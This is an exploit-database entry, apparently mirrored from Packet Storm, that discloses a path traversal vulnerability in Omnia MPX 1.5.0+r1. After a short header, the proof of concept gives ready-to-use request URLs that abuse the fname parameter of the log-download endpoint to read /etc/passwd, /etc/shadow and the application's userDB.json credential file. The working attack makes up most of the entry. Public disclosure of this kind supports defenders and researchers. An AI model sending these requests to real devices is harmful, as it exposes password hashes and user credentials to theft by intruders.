Share 
## https://sploitus.com/exploit?id=PACKETSTORM:167903
# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal  
# Date: 24/7/2022  
# Exploit Author: Momen Eldawakhly (Cyber Guy)  
# Vendor Homepage: https://www.telosalliance.com/  
# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions  
# Version: 1.5.0+r1  
# Tested on: MacOS  
# PoC:  
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd  
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow  
  
User Database:  
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json